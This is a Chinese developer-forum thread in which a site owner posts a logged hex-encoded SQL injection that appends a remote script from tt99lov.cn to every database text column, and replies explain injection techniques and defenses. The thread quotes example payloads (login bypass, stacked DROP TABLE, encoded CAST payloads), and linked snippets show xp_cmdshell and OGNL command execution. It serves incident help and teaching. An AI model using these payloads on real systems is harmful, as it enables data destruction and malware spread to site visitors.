-
等级
本版专家分:26结帖率 80% -
news-detail.asp newsid=3751;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f747439396c6f762e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);-- 80展开阅读全文
-
等级
本版专家分:26
-
各位帮忙看看。
-
等级
本版专家分:5
-
等待高手
-
等级
本版专家分:52049勋章
-
-
微软MVP
2011年7月 荣获微软MVP称号
2010年7月 荣获微软MVP称号
-
-
红花
2009年8月 MS-SQL Server大版内专家分月排行榜第一
2009年7月 MS-SQL Server大版内专家分月排行榜第一
-
- 黄花 2010年8月 其他数据库开发大版内专家分月排行榜第二
-
-
what is this?
-
等级
本版专家分:53857
-
同问
-
等级
本版专家分:26
-
被SQL注入了,帮忙看看,是啥原因。
-
等级
本版专家分:52049勋章
-
-
微软MVP
2011年7月 荣获微软MVP称号
2010年7月 荣获微软MVP称号
-
-
红花
2009年8月 MS-SQL Server大版内专家分月排行榜第一
2009年7月 MS-SQL Server大版内专家分月排行榜第一
-
- 黄花 2010年8月 其他数据库开发大版内专家分月排行榜第二
-
-
1.2 SQL注入攻击的防御手段
由于越来越多的攻击利用了SQL注入技术,也随之产生了很多试图解决注入漏洞的方案。目前被提出的
方案有:
(1) 在服务端正式处理之前对提交数据的合法性进行检查;
(2) 封装客户端提交信息;
(3) 替换或删除敏感字符/字符串;
(4) 屏蔽出错信息。
方案(1)被公认是最根本的解决方案,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作,
不过这需要开发者能够以一种安全的方式来构建网络应用程序,虽然已有大量针对在网络应用程序开发中如
何安全地访问数据库的文档出版,但仍然有很多开发者缺乏足够的安全意识,造成开发出的产品中依旧存在
注入漏洞;方案(2)的做法需要RDBMS的支持,目前只有Oracle采用该技术;方案(3)则是一种不完全的解决
措施,例如,当客户端的输入为“…ccmdmcmdd…”时,在对敏感字符串“cmd”替换删除以后,剩下的字符
正好是“…cmd…”;方案(4)是目前最常被采用的方法,很多安全文档都认为SQL注入攻击需要通过错误信
息收集信息,有些甚至声称某些特殊的任务若缺乏详细的错误信息则不能完成,这使很多安全专家形成一种
观念,即注入攻击在缺乏详细错误的情况下不能实施。
而实际上,屏蔽错误信息是在服务端处理完毕之后进行补救,攻击其实已经发生,只是企图阻止攻击者
知道攻击的结果而已。本文所介绍SQL盲注技术就是一些攻击者使用的新技术,其在错误信息被屏蔽的情况
下使攻击者仍能获得所需的信息,并继续实施注入攻击。
-
等级
本版专家分:52049勋章
-
-
微软MVP
2011年7月 荣获微软MVP称号
2010年7月 荣获微软MVP称号
-
-
红花
2009年8月 MS-SQL Server大版内专家分月排行榜第一
2009年7月 MS-SQL Server大版内专家分月排行榜第一
-
- 黄花 2010年8月 其他数据库开发大版内专家分月排行榜第二
-
-
不修改网站程序,使用第三方工具来防范SQL注入式攻击
网站要怎么防范最最常见SQL注入式攻击呢,我们先从SQL注入式攻击的原理来说起。
网站遭受SQL注入式攻击的基本原理:
1.没有正确过滤特殊字符,例如单引号和分号
如果你的sql语句是这样,又没过滤“’”单引号:
"SELECT * FROM tables WHERE param = '" + RequestString+ "'; "
攻击者将用户名变量(即RequestString)设置为:
a' or 't'='t
此时原始语句发生了变化:
SELECT * FROM tables WHERE param = 'a' OR 't'='t';
如果这种代码被用于一个认证过程,那么这个例子就能够强迫选择一个合法的用户名,因为赋值't'='t永远是正确的。
这种方式是跳过身份认证的最简单手段
再配合“;”分号可以进行更多的sql注入攻击
";"分号用来执行多个语句。下面语句中的RequestString的值将会导致删除“tables”表,
又可以从“dataTables”表中选择所有的数据(实际上就是透露了每一个用户的信息)。
a'; DROP TABLE tables; SELECT * FROM dataTables WHERE param LIKE '%
这就将最终的SQL语句变成下面这个样子:
SELECT * FROM tables WHERE param = 'a'; DROP TABLE tables; SELECT * FROM dataTables WHERE param LIKE '%';
通过这种原理可以执行很多很多攻击了。
2.不正确处理变量类型
如果一个用户提供的字段并非一个强类型,或者没有实施类型强制,就会发生这种形式的攻击。当在一个SQL语句中使用一个数字字段时,如果程序员没有检查用户输入的合法性(是否为数字型)就会发生这种攻击。
例如:“SELECT * FROM tables WHERE id = " + RequestID + "; "
从这个语句可以看出,作者希望RequestID是一个数字。
不过,如果终端用户选择一个字符串,就绕过了对转义字符的需要。
例 如,将RequestID设置为
1; DROP TABLE tables
就不需要上面说的“‘”单引号了,照样可以进行攻击:会将“tables”表从数据库中删除,
SQL语句变成:SELECT * FROM DATA WHERE id = 1; DROP TABLE users;
网站遭受SQL注入式攻击的基本方式:
1.最常见的也就是在查询字符串中直接输入SQL攻击字符串。
例如:page.asp?id=Num and exists (select * from [admin])
2.其次就是在FORM表单中提交的SQL注入攻击字段。
3.通过COOKIE绕过一些放注入的脚本程序
例如:javascript:alert(document.cookie="id="+escape("这就是asp? id=xx后面xx代表的数值) and (这里是注入攻击代码)"));
4.还有就是上面几种的攻击通过16进制编码后,绕过SQL注入检测的脚本程序
page.asp?id=Num;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072007300'
这种可以跳过敏感字符的判断和SQL关键词的判断。
总结一下,要防止SQL注入主要是要在查询字符串(QueryString),表单数据(PostData)以及Cookie甚至HTTP报头(Header)中防止掉一些特殊字符(单引号,分号)以及SQL语言的关键字,以及防止他们使用16进制编码。
用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。
准备工作:先去www.iisutm.com下载最新的IISUTM版本。
根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来,这里需要注意的是使用Windows 2003+iis6的服务器,需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。
安装完成,通过浏览器访问IISUTM的配置管理界面默认的是http://127.0.0.1:8362,这个是私有地址,只能在该服务器上访问,你需要任何地方都能访问的话,可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址,和你所开放的端口。这样你就可以通过你配置的地址进行访问,或者你可以在iis中直接管理名为IISUTM的站点。
登陆管理界面后点击上面导航栏中的“基本设置”,然后点击左边菜单的“防SQL注入”链接。
开启该链接里所有的选项,选中之后IISUTM会自动保存配置,下面的SQL注入关键字是该软件提供的SQL注入关键字以及特殊符号的特征库,你可以根据你网站的情况进行更改(最好不要修改)。IISUTM会自动拒绝16进制的编码。
确认以上的配置以后,你可以返回到IISUTM管理界面的首页,这里会列出最近服务器遭受到的攻击以及详细,赶紧去看看你的网站是不是随时有人在进行SQL注入吧,以及哪些攻击被IISUTM处理掉了。
-
等级
本版专家分:52049勋章
-
-
微软MVP
2011年7月 荣获微软MVP称号
2010年7月 荣获微软MVP称号
-
-
红花
2009年8月 MS-SQL Server大版内专家分月排行榜第一
2009年7月 MS-SQL Server大版内专家分月排行榜第一
-
- 黄花 2010年8月 其他数据库开发大版内专家分月排行榜第二
-
-
http://blog.163.com/best-abc/blog/static/118554004200952134651312/
你去看看这个文章 希望对你有帮助
-
等级
本版专家分:89386勋章
-
- 微软MVP 2012年10月 荣获微软MVP称号
-
-
黄花
2010年1月 MS-SQL Server大版内专家分月排行榜第二
2009年11月 MS-SQL Server大版内专家分月排行榜第二
-
-
蓝花
2012年10月 MS-SQL Server大版内专家分月排行榜第三
2010年7月 MS-SQL Server大版内专家分月排行榜第三
2010年3月 MS-SQL Server大版内专家分月排行榜第三
2010年2月 MS-SQL Server大版内专家分月排行榜第三
2009年8月 MS-SQL Server大版内专家分月排行榜第三
-
-
0.0帮顶
-
等级
本版专家分:52049勋章
-
-
微软MVP
2011年7月 荣获微软MVP称号
2010年7月 荣获微软MVP称号
-
-
红花
2009年8月 MS-SQL Server大版内专家分月排行榜第一
2009年7月 MS-SQL Server大版内专家分月排行榜第一
-
- 黄花 2010年8月 其他数据库开发大版内专家分月排行榜第二
-
-
http://topic.csdn.net/u/20090307/00/ab1872d2-0a72-4e32-91a4-3092f04e824d.html
http://topic.csdn.net/u/20090307/00/ab1872d2-0a72-4e32-91a4-3092f04e824d.html
多看看吧
- ecshop SQL注入通杀漏洞以及后台拿SHELL
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术 标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给...
- 怎么防止sql注入?
大佬们帮忙看一下看 很急!!! 我们网站被检测出问题来 我对market 进行了过滤 也不起作用 跪求大佬告知怎么解决!
- 有人遇到过项目中已经使用了hibernate,可是测试的时候依然会被sql注入,请问是怎么回事呢?
前端时间项目测试,测试人员使用appscan进行测试后没发现项目存在sql注入的问题且会把数据库的字段值改掉,但是我们项目中使用的hibernate,采用的是预编译的形式啊,为什么还会被sql注入呢,请大神们帮忙解答一下,...
- SQL注入
实质上,这种技术与SQL注入(SQLI)非常相似,虽然简单得多,因为我们不必完成任何奇怪和复杂的字符串。 在我继续之前,我想说的是,虽然我在谈论NodeJS,但在下面的示例中,我使用ExpressJS,它是最受欢迎的...
- PreparedStatement 预编译原理 可防止SQL注入
相关链接:验证preparedStatement防止SQL注入: http://blog.csdn.net/badyflf/article/details/7926944 preparedStatement 有三大优点: 一.代码的可读性和可维护性. 二.PreparedStatement尽最
- CTF实验吧简单的sql注入。自己写的wp!
先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select...
- sql注入 练手网站_WEB安全之SQL注入(8)——堆叠注入(Stacked injection)
数据库实现堆查询其实所谓的堆查询就是使用分号隔开同时执行多条sql语句。第一条语句查询表,第二条查询当前数据库名select*fromuser;selectdatabase();第一条查询表,第二条删除表 select * from users;delete ...
- sql注入的基础知识
作者:混世魔王… 文章来源:swords某日...于是,我决定帮忙监测一下网站有没有洞洞?很失望啊,很失望,在网站首页的所有潜在注入点都“试射”了一遍,没有发现一个可以利用的。郁闷之际,看到“美女图库”分栏目,决
- 【转载】sql注入之入门
原文在:https://smelond.com MySql基础语法 mysql无非就是增删改查 mysql数据库结构: 数据库 test,test1 ...现在,为了我们接下来的实验,我们需要切换数据库到test,mysql自带一...
- 2008 go server sql 批处理_Go 依赖注入 Dig
点击上方蓝色“Golang来啦”关注我哟加个“星标”,天天 15 分钟,掌握 Go 语言via:...今天这篇文章前面一部分简要介绍了下什么是依赖注入(DI),接着通过示例对比演示引入 DI 框架之后给程序带来...
- SSH 整合 当Action切面引入事务管理后,属性无法注入,求大神帮忙看一下
没加入事务切面前,Action中的注入costDao可以注入,可是applicationContext.xml加入了一下配置后 <!-- 声明事务管理,采用AOP形式切入 --> <!-- proxy-target-class指定采用cglib机制生成代理类 --> ...
- Android面试题整理
前言 本文整理了简书 goeasyway 面试相关文章,并在文章中加以自己的理解以及看见的部分精彩评论,所有文章并非自己原创,如对Android面试有兴趣,可前往作者文章专栏传送门或者关注对方的微信公众号:Android面试...
- Mysql 学习笔记(六):索引,数据备份,事务,sql注入
数据准备 索引原理 #!/usr/bin/env python # -*- coding:utf-8 -*- # 什么是索引 -- 目录 # 就是建立起的一个在存储表阶段 # 就有的一个存储结构能在查询的时候加速 ... # 读(查询)的速度就至关重要了 ...
- php数据插入问题,哪位大神帮忙看看
//取得表单中的值,检查表单中的值是否符合标准,并做适当转义,防止SQL注入 $username=$_POST['username']; $mobile=$_POST['mobile']; $city=$_POST['city']; $emile=$_POST['emile']; //打开数据库连接 $...
- [网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢...
- 初学sql注入
最近一直研究防止注入的问题。 要防止注入,就要学些注入吧。就像学抓小偷就要知道小偷是什么一样。 几天来,防止注入的方法没想出几个,到学了几个注入的方法。...最后我请胡总帮忙注入下,他说不在行。...
- SQL脚本语言
下面这些命令可以在命令行下用isql执行,isql -E -Q "命令",isql.exe为安装了mssql服务器自带的一个小程序 XP_CMDSHELL "dir" --执行DOS命令dir ...EXEC sp_addlogin golder, golder --添加SQL用户 解释:EXE
- 各位大神帮忙看看有什么错误,数据插入不到表格中
//取得表单中的值,检查表单中的值是否符合标准,并做适当转义,防止SQL注入 $username=$_POST['username']; $mobile=$_POST['mobile']; $city=$_POST['city']; $emile=$_POST['emile']; //打开...
- 依赖注入有点_Go 依赖注入 Dig
点击上方蓝色“Golang来啦”关注我哟加个“星标”,天天 15 分钟,掌握 Go 语言via:...今天这篇文章前面一部分简要介绍了下什么是依赖注入(DI),接着通过示例对比演示引入 DI 框架之后给程序带来...
- 泛微 E-Mobile Ognl 表达式注入
之前在吐司看到这个问题,后来想找原帖没搜到,于是找到了这个 ... 这里说的 ...message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())
- 自学java之MybatisPlus,再也不用写sql了
MybatisPlus 简介 ...损耗小:启动即会自动注入基本 CURD,性能基本无损耗,直接面向对象操作 强大的 CRUD 操作:内置通用 Mapper、通用 Service,仅仅通过少量配置即可实现单表大部分 CRUD 操作,更有
- 防注入(特别是:上传防止注入)
近来,网络上的SQL Injection 漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈.陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的...
- 二分查找结合sql盲注
二分查找结合sql盲注回顾分析网上的代码找学算法的同学帮忙大佬真强算法优化后算法优化前验证效果数据表结构优化前耗时优化后耗时 回顾 昨天晚上写了一个sql盲注的脚本,对数据是采用的枚举方法,简单跑了一下发现...
- SQLServer 的存储过程与java交互
Sql Server的存储过程是一个被命名的存储在服务器上的Transacation-Sql语句集合,是封装重复性工作的一种方法,它支持用户声明的变量、条件执行和其他强大的编程功能。 存储过程相对于其他的数据库访问方法有以下的...
- 几条命令用drozer挖漏洞(0基础)
本次主要面对于没有基础的新手,怎么用几条命令挖简单的组件漏洞(大部分为中危),经初次工具的使用练习,比较好挖的漏洞主要有,allowback(数据备份与恢复)、本地拒绝服务、本地sql注入。附个最近挖的部分垃圾洞...
- Hibernate+SpringMvc+spring 事务不起效果(求大神帮忙看下)
appliactionContent.xml ``` ... xsi:schemaLocation=" ... class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer"> ...-- 注入数据源 --> ...第一次接触这东西,求大神帮忙看下,在线等
- 使用springboot时注入SessionFactory报错
**将原来的一个web项目改成使用springboot时,启动时报错SessionFactory的bean找不到,具体信息如下,各位大佬帮忙看看吧。** web.xml: ``` <param-name>contextConfigLocation <param-value>/WEB-INF/...
- 【JavaWeb】67:这是一张只有程序员能看懂的图片
程序员也不一定能看懂吧,emm大概大概
- 科研伦理与学术规范 期末考试2 (40题).pdf
科研伦理与学术规范 期末考试2 (40题)
- 2020美赛O奖论文.zip
包含2020美赛所有题目的所有O奖论文,A题8篇,B题5篇,C题6篇,D题7篇,E题5篇,F题6篇。